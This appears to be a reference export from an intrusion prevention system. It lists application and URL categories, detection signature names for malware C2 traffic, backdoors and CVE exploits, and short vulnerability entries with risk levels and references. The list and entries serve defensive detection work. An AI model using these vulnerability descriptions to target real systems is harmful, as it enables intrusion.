URLList 3211750
URLList 3211751
URLList 3211752
URLList 3211753
URLList 3211754
URLList 3211755
URLList 3211756
URLList 3211757
URLList 3211758
URLList 3211759
URLList 3211760
URLList 3211761
URLList 3211762
URLList 3211763
URLList 3211764
URLList 3211765
URLList 3211766
URLList 3211767
URLList 3211768
URLList 3211769
URLList 3211770
URLList 3211771
URLList 3211772
URLList 3211773
URLList 3211774
URLList 3211775
URLList 3211776
URLList 3211777
URLList 3211778
URLList 3211779
URLList 3211780
URLList 3211781
URLList 3211782
URLList 3211783
URLList 3211784
URLList 3211785
URLList 3211786
URLList 3211787
URLList 3211788
URLList 3211789
URLList 3211790
URLList 3211791
URLList 3211792
URLList 3211793
URLList 3211794
URLList 3211795
URLList 3211796
URLList 3211797
URLList 3211798
URLList 3211799
URLList 3211800
URLList 3211801
URLList 3211802
URLList 3211803
URLList 3211804
URLList 3211805
URLList 3211806
URLList 3211807
URLList 3211808
URLList 3211809
URLList 3211810
URLList 3211811
URLList 3211812
URLList 3211813
URLList 3211814
URLList 3211815
URLList 3211816
URLList 3211817
URLList 3211818
URLList 3211819
URLList 3211820
URLList 3211821
URLList 3211822
URLList 3211823
URLList 3211824
URLList 3211825
URLList 3211826
URLList 3211827
URLList 3211828
URLList 3211829
URLList 3211830
URLList 3211831
URLList 3211832
URLList 3211833
URLList 3211834
URLList 3211835
URLList 3211836
URLList 3211837
URLList 3211838
URLList 3211839
URLList 3211840
URLList 3211841
URLList 3211842
URLList 3211843
URLList 3211844
URLList 3211845
URLList 3211846
URLList 3211847
URLList 3211848
URLList 3211849
URLList 3211850
URLList 3211851
URLList 3211852
URLList 3211853
URLList 3211854
URLList 3211855
URLList 3211856
URLList 3211857
URLList 3211858
URLList 3211859
URLList 3211860
URLList 3211861
URLList 3211862
URLList 3211863
URLList 3211864
URLList 3211865
URLList 3211866
URLList 3211867
URLList 3211868
URLList 3211869
URLList 3211870
URLList 3211871
URLList 3211872
URLList 3211873
URLList 3211874
URLList 3211875
URLList 3211876
URLList 3211877
URLList 3211878
URLList 3211879
URLList 3211880
URLList 3211881
URLList 3211882
URLList 3211883
URLList 3211884
URLList 3211885
URLList 3211886
URLList 3211887
URLList 3211888
URLList 3211889
URLList 3211890
URLList 3211891
URLList 3211892
URLList 3211893
URLList 3211894
URLList 3211895
URLList 3211896
URLList 3211897
URLList 3211898
URLList 3211899
URLList 3211900
URLList 3211901
URLList 3211902
URLList 3211903
URLList 3211904
URLList 3211905
URLList 3211906
URLList 3211907
URLList 3211908
URLList 3211909
URLList 3211910
URLList 3211911
URLList 3211912
URLList 3211913
URLList 3211914
URLList 3211915
URLList 3211916
URLList 3211917
URLList 3211918
URLList 3211919
URLList 3211920
URLList 3211921
URLList 3211922
URLList 3211923
URLList 3211924
URLList 3211925
URLList 3211926
URLList 3211927
URLList 3211928
URLList 3211929
URLList 3211930
URLList 3211931
URLList 3211932
URLList 3211933
URLList 3211934
URLList 3211935
URLList 3211936
URLList 3211937
URLList 3211938
URLList 3211939
URLList 3211940
URLList 3211941
URLList 3211942
URLList 3211943
URLList 3211944
URLList 3211945
URLList 3211946
URLList 3211947
URLList 3211948
URLList 3211949
URLList 3211950
URLList 3211951
URLList 3211952
URLList 3211953
URLList 3211954
URLList 3211955
URLList 3211956
URLList 3211957
URLList 3211958
URLList 3211959
URLList 3211960
URLList 3211961
URLList 3211962
URLList 3211963
URLList 3211964
URLList 3211965
URLList 3211966
URLList 3211967
URLList 3211968
URLList 3211969
URLList 3211970
URLList 3211971
URLList 3211972
URLList 3211973
URLList 3211974
URLList 3211975
URLList 3211976
URLList 3211977
URLList 3211978
URLList 3211979
URLList 3211980
URLList 3211981
URLList 3211982
URLList 3211983
URLList 3211984
URLList 3211985
URLList 3211986
URLList 3211987
URLList 3211988
URLList 3211989
URLList 3211990
URLList 3211991
URLList 3211992
URLList 3211993
URLList 3211994
URLList 3211995
URLList 3211996
URLList 3211997
URLList 3211998
URLList 3211999
URLList 3212000
URLList 3212001
URLList 3212002
URLList 3212003
URLList 3212004
URLList 3212005
URLList 3212006
URLList 3212007
URLList 3212008
URLList 3212009
URLList 3212010
URLList 3212011
URLList 3212012
URLList 3212013
URLList 3212014
URLList 3212015
URLList 3212016
URLList 3212017
URLList 3212018
URLList 3212019
URLList 3212020
URLList 3212021
URLList 3212022
URLList 3212023
URLList 3212024
URLList 3212025
URLList 3212026
URLList 3212027
URLList 3212028
URLList 3212029
URLList 3212030
URLList 3212031
URLList 3212032
URLList 3212033
URLList 3212034
URLList 3212035
URLList 3212036
URLList 3212037
URLList 3212038
URLList 3212039
URLList 3212040
URLList 3212041
URLList 3212042
URLList 3212043
URLList 3212044
URLList 3212045
URLList 3212046
URLList 3212047
URLList 3212048
URLList 3212049
URLList 3212050
URLList 3212051
URLList 3212052
URLList 3212053
URLList 3212054
URLList 3212055
URLList 3212056
URLList 3212057
URLList 3212058
URLList 3212059
URLList 3212060
URLList 3212061
URLList 3212062
URLList 3212063
URLList 3212064
URLList 3212065
URLList 3212066
URLList 3212067
URLList 3212068
URLList 3212069
URLList 3212070
URLList 3212071
URLList 3212072
URLList 3212073
URLList 3212074
URLList 3212075
URLList 3212076
URLList 3212077
URLList 3212078
URLList 3212079
URLList 3212080
URLList 3212081
URLList 3212082
URLList 3212083
URLList 3212084
URLList 3212085
URLList 3212086
URLList 3212087
URLList 3212088
URLList 3212089
URLList 3212090
URLList 3212091
URLList 3212092
URLList 3212093
URLList 3212094
URLList 3212095
URLList 3212096
URLList 3212097
URLList 3212098
URLList 3212099
URLList 3212100
URLList 3212101
URLList 3212102
URLList 3212103
URLList 3212104
URLList 3212105
URLList 3212106
URLList 3212107
URLList 3212108
URLList 3212109
URLList 3212110
URLList 3212111
URLList 3212112
URLList 3212113
URLList 3212114
URLList 3212115
URLList 3212116
URLList 3212117
URLList 3212118
URLList 3212119
URLList 3212120
URLList 3212121
URLList 3212122
URLList 3212123
URLList 3212124
URLList 3212125
URLList 3212126
URLList 3212127
URLList 3212128
URLList 3212129
URLList 3212130
URLList 3212131
URLList 3212132
URLList 3212133
URLList 3212134
URLList 3212135
URLList 3212136
URLList 3212137
URLList 3212138
URLList 3212139
URLList 3212140
URLList 3212141
URLList 3212142
URLList 3212143
URLList 3212144
URLList 3212145
URLList 3212146
URLList 3212147
URLList 3212148
URLList 3212149
URLList 3212150
URLList 3212151
URLList 3212152
URLList 3212153
URLList 3212154
URLList 3212155
URLList 3212156
URLList 3212157
URLList 3212158
URLList 3212159
URLList 3212160
URLList 3212161
URLList 3212162
URLList 3212163
URLList 3212164
URLList 3212165
URLList 3212166
URLList 3212167
URLList 3212168
URLList 3212169
URLList 3212170
URLList 3212171
URLList 3212172
URLList 3212173
URLList 3212174
URLList 3212175
URLList 3212176
URLList 3212177
URLList 3212178
URLList 3212179
URLList 3212180
URLList 3212181
URLList 3212182
URLList 3212183
URLList 3212184
URLList 3212185
URLList 3212186
URLList 3212187
URLList 3212188
URLList 3212189
URLList 3212190
URLList 3212191
URLList 3212192
URLList 3212193
URLList 3212194
URLList 3212195
URLList 3212196
URLList 3212197
URLList 3212198
URLList 3212199
URLList 3212200
URLList 3212201
URLList 3212202
URLList 3212203
URLList 3212204
URLList 3212205
URLList 3212206
URLList 3212207
URLList 3212208
URLList 3212209
URLList 3212210
URLList 3212211
URLList 3212212
URLList 3212213
URLList for Comodo-OCSP
URLList for Godaddy-OCSP
URLList for Jitsi-Meeting
URLList for Microsoft-Certificate-Revocation-List-Service
URLList for Microsoft-Online-Certificate-Status-Service
URLList for Psiphon
URLList for Suspicious Host
URLList for Zoho-Meeting-App
URL_Category-Accounting
URL_List-Common_Global_CRL
URL_List-Common_Global_OCSP
URL_List-Digmine-Cryptocurrency-Miner-URL
URL_List-DNS-Over-HTTPS
URL_List-Emotet-Trojan
URL_List-HIDDEN-COBRA-Domain
URL_List-Jaff-Ransomware-Download-URL
URL_List-Kaspersky-Update-Servers
URL_List-Known-Hostile-URL
URL_List-Known-Malicious-URL
URL_List-Quant-Loader-URL
URL_List-SunBurst-URL
URL_List-The-Deception-Project-Domain
URL_List-TrickBot-Malware-Download-URL
URL_List-URSNIF-Malware-URL
URL_List-VPNFilter-IoC-URL
URL_List-Wcry-Botnet
Us-Airways
US-National-Institutes-of-Health
US-National-Space-Agency
US-National-Weather-Service
US-NOAA
USAA
Usabilityhub
Usabilla
User Agent Stop Condition
User alert threshold exceeded
User Authentication HTTPS certificate expires soon
User Authentication HTTPS certificate has expired
User does not exist
User entered correct password/PIN
User entered wrong password/PIN
User has been locked for access
User has been locked for authentication
User has been Time-lock locked
User has been Time-lock unlocked
User has been unlocked for access
User has been unlocked for authentication
User-Session-Closed
User-Session-Created
UserEngage
UseResponse
Userify
Userlike-Live-Chat
Userplane
UserRules
Usersnap
UserTesting
Uservoice
Usga
USPS
Ustream
uStudio
UTBox
Utest
UTF TEXT File
Utilibill
Utilities-Online-Info
uTorrent
uTypia
UUSee
Uusi-Suomi
UW-Credit-Union
vaadin
Vakaka
Valant
Valic
Valmet-DNA-G3
Valmet-DNA-G4
Valve-Steam
Valve-Steam-Gaming
Vanguard
Vanilla-Forums
VanillaSoft
Vantiv
Vaultive
VaultLogix
vAuto
vBulletin
VBVoice
vCita
vCloud-Express
VC_CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow
VC_CVS-Argumentx-Command-Double-Free
VC_CVS-Directory-Request-Double-Free
VC_CVS-Entry-Line-Flag-Heap-Overflow-BSD
VC_CVS-Entry-Line-Flag-Heap-Overflow-Linux
VC_CVS-Error-Prog-Name-Double-Free
VC_CVS-File-Existence-Information-Disclosure
VC_CVS-Max-Dotdot-Integer-Overflow
Vedivi
Veeqo
Veetle
Veeva-Systems
Vehicles
Vektr
Velaro
Velocify
Velpic
Vembu
Vend
Venda
Vendini
Vendormate
VendorRisk
Venmo
Venngage
Ventuno
VentureDeal
VentureLoop
VenueManager
Venustech
Veoh
Veracart
Veracode
Verax-NMS
Veriato
VeriClock
Verify
Verint
Verio-Hosted-Exchange
VeriShow
Verisign-CRL
Verisign-OCSP
Verisure-IQ
Veritas Quick Assist
Verizon-Enterprise-Solutions
Verizon-Wireless
Versadial-Solutions
Versionone
Vertica
Verticalive
Verticalresponse
VESK
Vestorly
Via3
Viadeo
viaPeople
Viaplay
ViaPost
ViArt-Software
Vibeapp
VibeCatch
Viber
Vibesconnect.com
Vice
viCloning
VictorOps
Viddler
Viddy
Vidyard
Vidyo
View 3D
Viewpath
Viewpoint
Vigil
Viglink
Vimeo
Vindicia
Vine
Vines-Online-Solution
VinSolutions
Viocorp
Violence
VipaSuite
ViPNet-VPN
Viral Video
Viralheat-(Argyle-Social)
Viravis-Online-Database-Application-Platform
Virgin-Mobile-USA
Virto-Commerce
Virtual-Benefits-Administrator
Virtual-PBX
VirtualBox
VirtualMerchant
Virtualmin
Virtual_Context_Throughput-Exceeded
Virustotal
VisionFlow
Visionhelpdesk
VisiStat
VisitorTrack
Visma-Severa
Vista-Cinema
Vista-Print
Vistage-Connect
Visual Studio Redistributable Package
Visual-2000-ERP
Visual-Revenue
Visualsoft-eCommerce
Visualwebsiteoptimizer
Vitalist
Vitelity-Communications
Vivantio-Service-Desk
Vivocha
Vkontakte
VLC Media Player
VMware
VMware Remote Console
VMware Workstation
VNC
VNC-Deskhop
VNC-Java-Viewer
VNC-Remote-Framebuffer-Protocol
VNC-software
Vocalcom
Vocus
Vodafone-Cloud
Voddler
Voices.com
VoiceThread
VoIP.ms
Voipfone
VoipNow
Voipro
Volerro
Volt-CRM
Volusion
Vonage
Voog
VooV-Meeting
Vorex-Project-Management-Suite
Vormetric
Vox
VoyantHealth
VP-ASP-Shopping-Cart
VPN CA Certificate has expired
VPN Certificate expires soon
VPN certificate has expired
VPN Certificate warning: certificate expires in less than 7 days
VPN Certificate warning: certificate expires in less than 90 days
VPN-Broker_Client-Request
VPN-Broker_Connection_Error
VPN-Broker_Connection_Established
VPN-KeepAlive-Cannot-Establish
VPN-KeepAlive-Established
VPN-Over-DNS
VPN-Starting-User-Authentication
VPN-User-Authentication-Done
VPN-User-Authentication-Failed
vSource
VSP-Member-Login
vSphere Client
vSphere-Web-Client
VSTORE
vTiger-CRM
VTS
VTunnel
VTunnel.pk
Vudu
Vultr
Vuzit
Vyew
VyStar-Credit-Union
Vzaar
Vzochat
Vzones
W32Time
W3Counter
W3Now-Web-Design
WaasMedic
WAERlinx
Wagepoint
WageWorks
Wakoopa
Walgreens-Photo
WallSee
Wargaming
Washington-Post
Watchdox
Wave
Wavelink
Way2sms
Wayn
Waze
Wazuh Agent
WCBS-ACADEMIC
Weapons
Weather-Channel-Desktop
Weather-Underground
Weather.com
WeatherBug
Weaver
Web Analytics
Web and Email Marketing
Web and Email Spam
Web application failed to start
Web Chat
Web Collaboration
Web Configuration HTTPS certificate expires soon
Web Configuration HTTPS certificate has expired
Web Hosting
Web Images
Web Infrastructure
Web Portal Server: too many concurrent users
Web Portal Users License Exceeded
Web-Cube
Web-De-Mail
Web-Help-Desk
Web-Human-Resource
Web-Sudoku
Web-Suite-Pro
Web.com
WEB.DE
WebAlertPro
Webalo
Webcamnow
Webcargo
WebCash
WebCDR-Billing
WebCEO
Webcrm
WebDAM-Solutions
WebDAV
WebDPW
WebEDI
Webengage
Webex
Webex
Webex-Teams
WebExpenses
WebFaction
WebFiling
WebFilings-SEC-Reporting
Webflow
Webhard
Webhost-for-life
Webinars-OnAir
WebJaguar
webKPI
WebLaunching
WebLinc
WebLink-Connect
WebMaster-OneLine
WebMD
WebMerge
webMOBI
Weboffice
webOSCAR
Webpop
webPOS-Login
WebPrint
WebPt
Webreep
Webroot
Webroot-BrightCloud
Webropol-2.0-Clover
Webs
webShaper
Webshots
Website Translation
WebsiteAlive
WebSitePulse
WebSocket
WebSocket_CS-Beyondtrust-Command-Injection-CVE-2024-12356
WebSocket_CS-Drovorub-Malware-C2-Communication
WebSocket_CS-Jenkins-Arbitrary-File-Read-CVE-2024-23897
WebSocket_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
WebSocket_CS-NodeBB-Socket.io-Elevation-Of-Privilege
WebSocket_CS-NodeBB-Socket.io-Eventname-Denial-Of-Service
WebSocket_CS-Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution
WebSocket_CS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
WebSocket_CS-STOMP-Connect-Request
WebSocket_CS-STOMP-Disconnect-Request
WebSocket_CS-STOMP-Error-Response
WebSocket_CS-Zero-Payload
WebSocket_SS-Drovorub-Malware-C2-Communication
WebSocket_SS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
WebSocket_SS-STOMP-Connected-Response
Websolr
WebSource-CPQ-(Configure-Price-Quote)
WebSphere-MQ
WebSpy
Webtrekk
Webtrends
Webuzo
WebX
Webydo
WeChat
WeChat-Call
WeChat-FileTransfer
WeCom
WeCom URL List
Wedoist
Weebly
Weekdone
Weemss
Weidenhammer
Weight-Watchers
Wepay
WestHost
Westlaw
WestMonroe
Wesupply
WeThrive
WeTransfer
WeVideo
WFMwizard
WhatCounts
Whatfix
WhatsApp
WhatUsersDo
When-I-Work
WhenToWork
Whisbi
White-Source-Software
WhiteHat
WhitePages
WHMCS
Who's-Calling
Whos.Amung.Us
WhosOff
WHOSOFFICE
WhosOn
Wickr
Widen
Wideo
Wiggio
Wikia
Wikibooks
Wikidot
Wikimapia
Wikimedia-Commons
Wikinews
Wikipedia
Wikiquote
Wikisource
Wikispaces
Wikispecies
Wikitree
Wikiversity
Wiktionary
Wild-West-Domains-Reseller
WildFire
Wildstar-Online
Willis-Towers-Watson
Wimi
Wimp
WinAir
Winamax
Winamp
Winamp
Winamp-Remote
Windows 10
Windows 10 Update Assistant
Windows 11
Windows 7
Windows 8
Windows 8.1
Windows Activation Technologies Service
Windows ContactSupport
Windows Diagnostics Tracking
Windows Error Reporting
Windows Installer
Windows Kernel
Windows Script Host
Windows Search
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows Store
Windows Store Broker
Windows System Settings
Windows User Account Control Panel Host
Windows Web Application
Windows-Live-Devices
Windows-Live-Mesh
Windows-Live-Spaces
Windows-Phone-Store
Windows-Search-Assistant
Windows-Update-Delivery-Optimization
WindsCRM
Windstream-Business
Windward-Studios
Winkflash
Winnebago-Industries
WinSCP
WINS_Buffer-Overflow-2-MS09-039
WINS_Buffer-Overflow-MS09-039
WINS_CS-Microsoft-WINS-Memory-Overwrite-CVE-2008-1451
WINS_CS-Microsoft-WINS-Service-Failed-Response-CVE-2011-1248
WINS_Replication-Packet-BOF-System-Compromise
WINS_Replication-Packet-System-Compromise
WINS_WINS-Computer-Name-Validation-Buffer-Overflow
Wintac
WinWeb
Wireclub
Wiredrive
WiredTree
Wireless Background Task
Wireshark
Wishpond
WishSimple
WISP
Wistia
Withings
Wix
Wixi
Wizehive
WizIQ
WMIC
WmiPrvSE.exe
WO-Streaming
Wolfram-Alpha
Wolt
Wondershare
Woodpecker-it
Woofiles
Woome
Woopra
WooRank
Woot
Wordfast-Anywhere
Wordpress
Wordpress-CMS
WordStream
Workable
Workamajig
Workboard
WorkBook
Workbooks-CRM
Workday
Worketc
Workface-Chat
Workflowmax
WorkFlowy
Workforce-Guardian
Workforce-Velocity
Workforcegrowth
Workfront
WorkSafeOnline
Workshare
Workspot
WorkTrail
WorkXpress-Build-from-Scratch
WorkZone
World-Manager
World-Web-Studio
WorldAPP
Worldapp-Key-Survey
Worldpay
Worldwinner
Wormly
WOW Presents Plus
Wowhead
WP-EasyCart
WPEngine
Wrike
Wufoo
Wunderlist
WWD
Wwitv.com
Wymsy
WYSIWYG-Web-Builder
X
X-Font-Server
X-VPN
X11
X11_CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow
X11_CS-IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability
X11_CS-Oracle-Application-Server-10g-OPMN-Service-Format-String
X11_Remote-XOpen
X11_ThetHing-Backdoor-Banner
X11_ThetHing-Backdoor-Connected
Xactly-Incent
XaitPorter
Xamarin
Xanga
xAssets
Xat
XC-E-Commerce-Platform
xCALLY
xcAuction
Xcentric
XCloud
Xeesm
Xendo
Xero
Xeround
Xerox-Cloud-Services
Xetex-Xebra
Xfinity-TV
Xfire
Xhamster
Xignite
Xilnex-Retail-Business-Solution
Xing
XING-Events
Xinhuanet
XKCD
XM-online+
Xmarks
xMatters
Xname.org
XO-Communications-Business-Center
Xobni
Xpenditure
XPlace
Xpressdocs
xRP
XSellco
xTuple
Xvideos
Xxxoh
Xyea
Xymon
Yahoo
Yahoo!-Blog-Posting
Yahoo-Blogs
Yahoo-Buzz
Yahoo-Calendar
Yahoo-Days
Yahoo-Douga
Yahoo-Finance
Yahoo-Games
Yahoo-Groups
Yahoo-Music
Yahoo-Notepad
Yahoo-Pulse
Yahoo-RightMedia
Yahoo-Sports
Yahoo-Toolbar
Yahoo-Web-Mail
Yahoo-Web-Messenger
Yammer
Yandex
Yandex-Disk
Yandex-Mail
Yanomo
Yapchat
Yaplog!
Yardi-Systems
Yealink
Yellowfin-Analytics
Yelp
Yendo
Yesware
Ylastic
YLE
YLE-Areena
YLE-Lapset
Yo!Kart
Yodiz
Yodle
Yodlee
Yodlee-Money-Center
Yola
Yonyx-Interactive-Guides
Yoolink
Yoomit
Youcalc
Youdecide
Youjizz
Youku
Younicycle
Younility
Younited
YouNoodle
Your-BitTorrent
Your-Freedom
YourEcommerce
Yourfilehost
Youseemore
YouSendit
YouTube
YouTube Commenting
Youtube Moderate Resolve
Youtube Moderate Rewrite
YouTube Sharing
Youtube Strict Resolve
Youtube Strict Rewrite
YouTube Video Upload
Ypserv
YuDu-Global
Yugma
Yum-Update
YuMe
Yuml
Yummy-Software
Yupptv
Yuuguu
Z-Bake-Desktop
Zabbix
Zamzar
Zapak-Mail
Zapier
Zaplee
Zappos
Zapproved
ZAPTEST
Zavanti-ERP
Zbigz
ZCOPE
zeckoShop
Zed-Axis
Zelune-Proxy
Zenbe-Mail
ZenCart
ZenCash
Zencoder
Zendesk
ZenDoc
Zendone
Zenefits
ZenFieldservice
Zenfolio
Zenkraft
ZenMate
Zenno
ZenPayroll
Zenput---Mobile-Forms
Zentail-Commerce
ZeptoLab-Cut-the-Rope
ZeptoLab-Pudding-Monsters
ZergNet
Zero
ZeroCater
Zeropc
ZeroTier
ZeroTier
Zetta
Zeus-Travel-Office
Ziddu
Zilicus
Zillow
zimbra
Zimbra-Collaboration-Suite
Zimplu-CRM
Zinepal
ZingCheckout
Zingiri
Zingtree
Zinio
Zions-Bancorporation
Zip File
Zip-Cloud
ZipBoss
Zipcar
ZipDX
ZippyShare
Ziprecruiter
Zipsurvey
Zmags
Zmanda
Zocdoc
Zoho
Zoho-Meeting-App
ZoneEdit
Zoolz
Zoom
Zoom
Zoomerang
ZoomInfo
Zoovy
Zopim
Zotero
ZOZI
Zscaler
Zultys
ZumoDrive
Zuora
Zuppler
Zylom
Zyme
Zyncro
Zynga-FarmVille
Zynga-Games
Zynga-Mafia-Wars
Zyyne

Vulnerabilities


.NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft .NET Framework
Type: Malfunction
Description: There exists a stack overflow vulnerability in Microsoft .NET Framework.
Situation: File-TextId_.NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033
References:
CVE-2016-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0033
MS16-019
http://technet.microsoft.com/security/bulletin/MS16-019
Back to top

100Bao-Peer-To-Peer-Network

About this vulnerability: 100bao peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 100Bao
Type: Peer-to-Peer
Description: 100bao is a Chinese P2P file-sharing program that is specifically centered around users uploading media content for other users to view using their application.
Situation: Shared_CS-100Bao-Query
Back to top

180-Search-Assistant

About this vulnerability: 180 Seach Assistant internet explorer plugin
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 180 Search Assistant
Type: Misconfiguration
Description: 180 Search Assistant is an internet explorer plugin that provides popup advertisement and may disclose browsing information to its parent company. Some organizations may consider this unwanted software.
Situation: HTTP_CS-180-Search-Assistant-Information-Disclosure
Back to top

2020search

About this vulnerability: 2020Search
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 2020Search
Type: Misconfiguration
Description: 2020Search is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-2020search
HTTP_CSH-2020search
Back to top

2nd-Thought

About this vulnerability: 2nd Thought
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 2nd Thought
Type: Code Injection
Description: 2nd Thought is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-2nd-Thought
Back to top

2Wire-Cross-Site-Request-Forgery

About this vulnerability: A 2Wire Cross-Site Request Forgery vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 2Wire Router
Type: Cross-site Scripting
Description: A vulnerability in 2Wire Routers, firmware versions 3.17.5 and 5.29.51, which allows remote attackers to perform configuration changes as administrator.
Situation: HTTP_CSU_2Wire-Cross-Site-Request-Forgery
References:
CVE-2007-4387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387
BID-36075
http://www.securityfocus.com/bid/36075
OSVDB-37667
http://www.osvdb.org/37667
Back to top

3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass

About this vulnerability: A vulnerability in 3Com OfficeConnect ADSL Wireless 11g Router
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 3Com OfficeConnect ADSL Wireless 11g Router
Type: Malfunction
Description: There is an authentication bypass vulnerability in the 3Com OfficeConnect ADSL Wireless 11g Firewall Router. The vulnerability can be exploited by sending a malicious HTTP request to the router.
Situation: HTTP_CSU-3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass
Back to top

3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954

About this vulnerability: A vulnerability in 3CX Phone System
Risk: High
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Platform: Generic
Software: 3CX Phone System
Type: Input Validation
Description: An SQL injection vulnerability has been reported in 3CX VoIP phone system's CRM integration with SQL databases.
Situation: HTTP_CRL-3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954
References:
CVE-2023-49954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49954
Back to top

3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload

About this vulnerability: A 3CX Phone System VAD_Deploy.aspx Arbitrary File Upload vulnerability
Risk: Moderate
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 3CX Phone System
Type: Script Injection
Description: A vulnerability in 3CX Phone System Manager Server version v11.0.42267.865, in abyssws.exe, which allows remote attackers to upload arbitrary scripts into a web path through the VAD_Deploy.aspx script.
Situation: HTTP_CS-3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload
Back to top

3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow

About this vulnerability: There exists a buffer overflow vulnerability in 3ivx MPEG-4.
Risk: High
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 3ivx
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in 3ivx MPEG-4. Specifically, the vulnerability is due to improper handling of MP4 files by the 3ivx MPEG-4 codec plugin. A remote attacker can exploit this vulnerability by enticing the target user to open crafted MP4 file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user.
Situation: HTTP_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
File-MPEG_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
References:
CVE-2007-6402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6402
BID-26773
http://www.securityfocus.com/bid/26773
Back to top

3s-Smart-Software-Solutions-Codesys-Gateway-Server-Arbitrary-File-Creation

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Directory Traversal
Description: There is an arbitrary file creation vulnerability in 3S Smart Software CoDeSys. The vulnerability is due to insufficient validation of the upload path provided in Opcode 06 commands. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP and 1210/TCP. An attacker can execute arbitrary code by uploading a specially crafted MOF file.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Arbitrary-File-Creation
References:
CVE-2012-4705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4705
OSVDB-90368
http://www.osvdb.org/90368
Back to top

3s-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Input Validation
Description: There is a denial of service vulnerability in 3S Smart Software Solutions CoDeSys Gateway Server. The vulnerability is due to improper allocation of heap memory. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP or 1210/TCP. Successful exploitation could cause the affected application to terminate abnormally.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service
References:
CVE-2012-4707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4707
OSVDB-90370
http://www.osvdb.org/90370
Back to top

3s-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Malfunction
Description: There is a memory access error vulnerability in Smart Software CoDeSys Gateway Server. The vulnerability is due to improper handling of a array index that will lead to reading from or writing to a memory location that is outside of the intended boundary of the buffer. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP and 1210/TCP. Successful exploitation could result in code execution with SYSTEM privileges. Unsuccessful attack attempts could cause the affected service to terminate abnormally, causing a denial of service (DoS) condition.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error
References:
CVE-2012-4704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4704
OSVDB-90367
http://www.osvdb.org/90367
Back to top

3s-Smart-Software-Solutions-Codesys-Gateway-Server-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
